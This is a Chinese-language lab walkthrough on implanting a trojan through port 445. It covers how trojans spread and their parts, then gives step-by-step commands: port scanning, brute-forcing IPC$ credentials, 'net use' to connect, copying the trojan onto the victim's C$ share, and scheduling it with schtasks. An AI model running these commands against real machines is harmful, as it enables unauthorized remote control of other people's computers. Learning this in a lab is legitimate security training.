4、实验、利用445植入木马
实验、利用445植入木马
一、实验内容:神奇的木马
二、实验目标
通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。
三、木马概述
什么是木马
木马通常称为黑客程序的恶意代码,可以为黑客提供远程控制植入主机的服务,木马也称为特洛伊木马(特洛伊木马,来自一个古代的战争故事。)。
木马的传播途径
1、互联网浏览,通过浏览器漏洞或浏览器插件漏洞(Flash、迅雷等);
2、QQ、MSN等即时通讯软件,发送恶意网址链接或木马病毒文件;
3、使用U盘等移动存储介质;
4、陌生邮件,通过电子邮件内恶意代码或含木马病毒的附件;
5、伪装成多媒体影音文件或植入木马的应用软件,利用P2P平台和网站传播;
6、利用操作系统漏洞或弱口令直接远程植入;
7、下载来源不明的程序。
木马的组成
- 客户端程序:黑客主机上的控制台,负责远程遥控指挥与木马连接。
- 服务器端程序:服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡。
四、实验步骤
1、准备肉鸡服务器、黑客客户端,并桥接保证连通性
2、使用木马制作工具(远程连接软件自动生成)获得木马服务程序。木马以服务的形式植入到肉机中。
3、端口扫描,scanport扫描局域网内有没有445端口(共享文件服务)在开放。
4、选择肉鸡使用NTscan工具进行暴力破解,连接对方的IPC空连接
- 连接远程共享的命令
1 | net use \\IP地址\IPC$ 密码 /user:用户名 |
- 利用copy命令从黑客客户机中把木马服务copy到肉机中
1 | copy 木马地址 \\IP地址\C$ |
- 利用IPC空连接可执行命令的特点,设置肉机的计划任务,让其自动运行木马服务。
1 | net time \\IP地址 |
五、常用DOS
1 | Tasklist [/S system [/U username [/P [password]]]] [/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH] #列出进程列表 |
schtasks /create /tn “zjc” /ru 18265 /tr D:\zjc.bat /sc ONCE /st 19:45
schtasks.exe /delete /TN zjc1